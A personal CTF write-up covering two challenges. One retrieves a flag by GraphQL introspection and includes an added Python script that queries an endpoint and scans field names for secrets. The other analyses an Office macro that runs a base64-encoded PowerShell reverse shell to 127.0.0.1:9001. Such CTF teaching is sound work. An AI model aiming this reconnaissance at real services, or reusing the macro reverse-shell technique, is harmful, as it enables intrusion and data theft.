This year I attended the SheHacks Annual InterVarsity CTF, a two-day event hosted at USIU-Africa. It was a fun experience, apart from the tough CTF challenges 😨. This is a write-up of the few I managed to solve. 😌
Graph1#
The link took us to a page that only says "Graphql running...".
Checking the usual paths for a GraphQL instance, I found the endpoint at `/graphql`.
The next step is to enumerate all available types and fields with the introspection query `query={__schema{types{name,fields{name}}}}`, which returns the schema information.
The introspection output reveals a `getFlag` field, which likely retrieves the contents of the Flag table.
Sending `query={getFlag {id flag}}` returns a base64-encoded flag value.
Decoding… Voila!😮
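The whole Graph1 routine in one script, as an added example that is not part of the original write-up: it flattens an introspection result, picks out field names that hint at sensitive data, and base64-decodes whatever `getFlag` returns. The endpoint path, the two sample responses and the placeholder flag `SHCTF{example}` are constructed for the offline run; against a live target the same queries are sent as the `query` GET parameter, exactly as in the write-up.

```python
import base64
import json
import sys
import urllib.parse
import urllib.request

# The two queries used in the write-up, sent as the `query` GET parameter.
INTROSPECTION_QUERY = "{__schema{types{name,fields{name}}}}"
FLAG_QUERY = "{getFlag {id flag}}"

# Constructed sample responses so the script runs offline; they are NOT the
# challenge server's real output, only the shape a GraphQL endpoint returns.
SAMPLE_INTROSPECTION = {"data": {"__schema": {"types": [
    {"name": "Query", "fields": [{"name": "getFlag"}, {"name": "users"}]},
    {"name": "Flag", "fields": [{"name": "id"}, {"name": "flag"}]},
    {"name": "String", "fields": None},
    {"name": "__Schema", "fields": [{"name": "types"}]},
]}}}
SAMPLE_FLAG_RESPONSE = {"data": {"getFlag": [
    {"id": 1, "flag": "U0hDVEZ7ZXhhbXBsZX0="},  # base64 of the placeholder SHCTF{example}
]}}


def send_query(endpoint: str, query: str) -> dict:
    """GET <endpoint>?query=... like the write-up does; most servers also accept POST JSON."""
    url = endpoint + "?" + urllib.parse.urlencode({"query": query})
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.loads(resp.read().decode())


def fields_by_type(introspection: dict) -> dict:
    """Flatten the introspection result to {type: [field, ...]}, dropping GraphQL's own __ types."""
    out = {}
    for t in introspection["data"]["__schema"]["types"]:
        if t["name"].startswith("__"):
            continue
        out[t["name"]] = [f["name"] for f in (t.get("fields") or [])]
    return out


def interesting_fields(schema: dict, keywords=("flag", "secret", "admin", "password")) -> list:
    """Return (type, field) pairs whose name hints at sensitive data."""
    return [(t, f) for t, names in schema.items() for f in names
            if any(k in f.lower() for k in keywords)]


def decode_flags(flag_response: dict) -> list:
    """getFlag may return one row or a list of rows; base64-decode the `flag` of each."""
    rows = flag_response["data"]["getFlag"]
    if isinstance(rows, dict):
        rows = [rows]
    return [base64.b64decode(r["flag"]).decode() for r in rows]


def solve(introspection: dict, flag_response: dict) -> dict:
    schema = fields_by_type(introspection)
    return {"schema": schema, "hits": interesting_fields(schema), "flags": decode_flags(flag_response)}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # live mode: python graph1.py http://target/graphql
        ep = sys.argv[1]
        result = solve(send_query(ep, INTROSPECTION_QUERY), send_query(ep, FLAG_QUERY))
    else:                  # offline mode on the constructed samples
        result = solve(SAMPLE_INTROSPECTION, SAMPLE_FLAG_RESPONSE)
    print(json.dumps(result, indent=2))
```

Introspection is frequently left enabled on CTF and internal GraphQL instances; if it is disabled, the same field names can still be guessed from the server's "Did you mean ..." suggestions, which is why the keyword search is kept separate from the introspection parsing.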
Adress#
This was an easy challenge that required analysing macro-based source code. Macro-based malware consists of scripts (JS, PowerShell, VBS) embedded inside MS Office documents to abuse the macro feature.
To check whether a document contains any embedded macro scripts, we use the oledump.py or olevba tools.
The letter M next to a stream indicates that the stream contains macro code. We could read it with `oledump.py books.xls -s 8 -v` (`-v` decompresses the VBA source; `-d` would only dump the raw, compressed stream), but `olevba books.xls` does a better job.
We can see the macro source code for Module 1 and Module 2. Module 1 is a VBA script that reads the document properties and executes the value of the property named Comments. If we examine the file properties, Comments holds a command that spawns the command prompt and prints Oops.
The second module is PowerShell that executes what looks like a base64-encoded string. Let's uncover what that is.
It turns out to be a basic PowerShell reverse shell that connects to a local server (127.0.0.1), reads commands from it and executes them. The challenge asked for the IP address and the port: SHCTF{127.0.0.1:9001} 😃.